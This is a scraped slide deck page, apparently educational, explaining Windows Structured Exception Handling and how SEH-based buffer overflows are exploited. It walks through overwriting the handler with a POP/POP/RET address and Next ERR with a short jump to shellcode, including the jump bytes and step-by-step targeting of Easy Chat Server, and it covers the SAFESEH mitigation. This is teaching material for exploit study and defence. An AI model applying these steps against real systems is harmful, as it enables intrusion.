CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
 
Coal (1)
Coal (1)Coal (1)
Coal (1)
 
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh SharmaBuffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
 
test
testtest
test
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptxSEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basics
 

More from Mihir Shah

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcoding
Mihir Shah
 
Kubernetes
KubernetesKubernetes
Kubernetes
Mihir Shah
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
Mihir Shah
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containers
Mihir Shah
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Mihir Shah
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the crypto
Mihir Shah
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
Mihir Shah
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
Mihir Shah
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdb
Mihir Shah
 
ROP
ROPROP
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
Mihir Shah
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!
Mihir Shah
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Mihir Shah
 

More from Mihir Shah (13)

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcoding
 
Kubernetes
KubernetesKubernetes
Kubernetes
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containers
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the crypto
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdb
 
ROP
ROPROP
ROP
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
 

Recently uploaded

From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 

Recently uploaded (20)

From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 

Seh based attack

  • 1. SEH BASED BUFFER OVERFLOW
  • 2.
  • 3.
  • 4. What is an Exception • An exception is an event that occurs during execution and requires code outside the normal flow of control to run.
  • 5. Exception Basics (diagram: Operating System, Process, Exception Handler)
    __try {
        // exception may occur here
        …..
    } __except(exception filter) {
        // this handles the exception
        ….. printf("exception");
    }
  • 6. How does the OS locate the Handlers (diagram): Process → Thread Information Block → Exception Registration; FS:[0] points to the first Exception Registration Record, which is 8 bytes: Pointer to Next Record, Pointer to Handler
  • 7. Complicated Program with SEH
    Main() { functionA(); }
    functionA() { __try { functionB(); } __except(…..) { ….. } }
    functionB() { __try { functionC(); } __except(….) { ….. } }
    functionC() { __try { print("SEH Demo"); } __except(….) { ….. } }
  • 8. Exception Registration Linked List (diagram): Process → Thread Information Block → Exception Registration; FS:[0] → Record 1 (8 bytes: FFFFFFFF, OS Handler)
  • 9. Complicated Program with SEH: same program; execution is now at the line before functionB() inside functionA's __try block
  • 10. Exception Registration Linked List (diagram): FS:[0] → Record 1 (Ptr to R2, Function A Handler) → Record 2 (FFFFFFFF, OS Handler)
  • 11. Complicated Program with SEH: same program; execution is now at the line before functionC() inside functionB's __try block
  • 12. Exception Registration Linked List (diagram): FS:[0] → Record 1 (Ptr to R2, FunctionB Handler) → Record 2 (Ptr to R3, FunctionA Handler) → Record 3 (FFFFFFFF, OS Handler)
  • 13. Complicated Program with SEH: same program; execution has now entered functionC, so all three handlers are registered
  • 14. Exception Registration Linked List (diagram): FS:[0] → Record 1 (Ptr to R2, FunctionC Handler) → Record 2 (Ptr to R3, FunctionB Handler) → Record 3 (Ptr to R4, FunctionA Handler) → Record 4 (FFFFFFFF, OS Handler)
  • 16. Program Stack without SEH (diagram, listed from the top of the stack at lower memory addresses down to the Bottom of Stack at high memory addresses; ESP and EBP point into funcC's frame, and the Unused Stack lies below ESP)
    funcC's Stack Frame: funcC Local Variables, funcB's EBP, Return Address in funcB, funcC Argument 1, funcC Argument 2
    funcB's Stack Frame: funcB Local Variables, funcA's EBP, Return Address in funcA, funcB Argument 1, funcB Argument 2
    funcA's Stack Frame: funcA Local Variables, Caller's EBP, Return Address in Caller, funcA Argument 1, funcA Argument 2
  • 18. Program Stack with SEH (diagram, same layout as slide 16; each frame now carries an Exception Registration Record between its local variables and the saved EBP)
    funcC's Stack Frame: funcC Local Variables, funcC's Exception Registration Record (Next Exception_Registration_Record, funcC Exception Handler), funcB's EBP, Return Address in funcB, funcC Argument 1, funcC Argument 2
    funcB's Stack Frame: funcB Local Variables, funcB's Exception Registration Record (Next Exception_Registration_Record, funcB Exception Handler), funcA's EBP, Return Address in funcA, funcB Argument 1, funcB Argument 2
    funcA's Stack Frame: funcA Local Variables, funcA's Exception Registration Record (Next Exception_Registration_Record, funcA Exception Handler), Caller's EBP, Return Address in Caller, funcA Argument 1, funcA Argument 2
  • 19. Quick Recap of Concepts
    • SEH consists of a chain of Exception Registration Records
    • These records are dynamically added to and removed from a linked list as execution moves through the code
    • FS:[0] points to the start of the SEH chain
    • When an exception happens, the OS walks the SEH chain to find a handler that can handle the exception
    • If a handler is found, it handles the exception; otherwise the default OS handler kicks in
  • 20. Who walks the SEH chain? The Exception Dispatcher: KiUserExceptionDispatcher() → RtlDispatchException() → RtlExecuteHandlerForException() → ExecuteHandler() → _except_handler()
  • 21. _except_handler3() in turn calls our handler
    _except_handler3() { Scopetable filter-expression(); _global_unwind2(); RtlUnwind(); RtlExecuteHandlerForUnwind(); Scopetable __except block(); }
    __try { int *p = 0x000000; *p = 10; } __except(filter(…….)) { ….. printf("exception"); }
  • 22. Handler Prototype • The prototype for the exception handler is as follows (excpt.h):
    EXCEPTION_DISPOSITION __cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord, void *EstablisherFrame, struct _CONTEXT *ContextRecord, void *DispatcherContext);
  • 23. Analyzing the 2 Stack Frames (diagram). Program Stack (Low Memory at the top; FS[0] points at the current record): Local Variable, Next ERR, ExceptionHandler(), Func-B EBP, RET of Func-B, Func-C Arg 1, Func-C Arg 2. Exception Dispatcher Stack: ….. at ESP, ….. at ESP+4, Establisher Frame at ESP+8, ….. EIP is at the entry of ExceptionHandler() {
  • 24. What if? Same two stacks, but ExceptionHandler() now begins with the sequence pop eax / pop ebx / retn
  • 25. Pop EAX: the value at ESP is popped; ESP moves up one slot
  • 26. Pop EBX: the next value is popped; ESP now points at the Establisher Frame slot
  • 27. RETN: the Establisher Frame value is popped into EIP
  • 28. After RETN: EIP points at the Establisher Frame, that is, at the Next ERR entry on the program stack
  • 29. Demo of overwrite with AAAAA….
    • Verify that the POP/POP/RET sequence sends control to the Next ERR location
    • Cause a buffer overflow in the Easy Chat program by sending a large number of A's
  • 30. How do we exploit this condition? (diagram) Program Stack before (Low Memory at the top, FS[0] at the record): Local Variable, Next ERR, ExceptionHandler(), Func-B EBP, RET of Func-B, Func-C Arg 1, Func-C Arg 2. Program Stack after overwrite: the same slots filled with AAAA
  • 31. How do we exploit this condition? (diagram) Program Stack after overwrite: Next ERR replaced by a Short JMP 6 Bytes, ExceptionHandler() pointing at a pop eax / pop ebx / retn sequence
  • 32. How do we exploit this condition? (diagram) Program Stack after overwrite: AAAA, Short JMP 6 Bytes, ExceptionHandler() (pop eax / pop ebx / retn), NOP sled, Payload; after retn, EIP lands on the Establisher Frame. Layout of the overwrite, Low Memory first: Short JMP 6 Bytes (2 bytes), 2 NOP (2 bytes), Ptr to EH (4 bytes), NOP Sled (variable length), Payload (variable length)
  • 33. Let's exploit Easy Chat Server • Steps:
    • Find the exact offset of Next ERR and ExceptionHandler() on the stack
    • Find a POP/POP/RET sequence in a module without SAFESEH
    • Overwrite ExceptionHandler() with the address of the POP/POP/RET
    • Overwrite Next ERR with a short JMP of 6 bytes => "\xEB\x06\x90\x90"
    • Add the payload 6 bytes after the ExceptionHandler() slot
  • 34. SEH Exploitation Protection
    • Modules linked with /SAFESEH cannot be used
    • /SAFESEH creates a list of "safe" exception handlers
    • The OS matches the exception handler address against this list before executing it
    • Only if there is a match in this list does execution happen
    • Microsoft introduced this to protect SEH from exploitation; it applies from Windows XP SP1 onwards
  • 35. ABUSING SEH Access violation / exception is triggered Pointer to Next SEH record Current SE Handler Pop,pop,ret Shellcode (1) Exception Handler kicks in (2) Current SE Handler was overwritten and points to pop,pop,ret (3) pop,pop,ret During prologue of exception handler, address of pointer to next SEH was put on stack of ESP+8 pop pop ret puts this address in EIP and allows execution of the code at the address of “pointer to next SEH” (4) Pointer to next SEH was overwritten with jmp to shellcode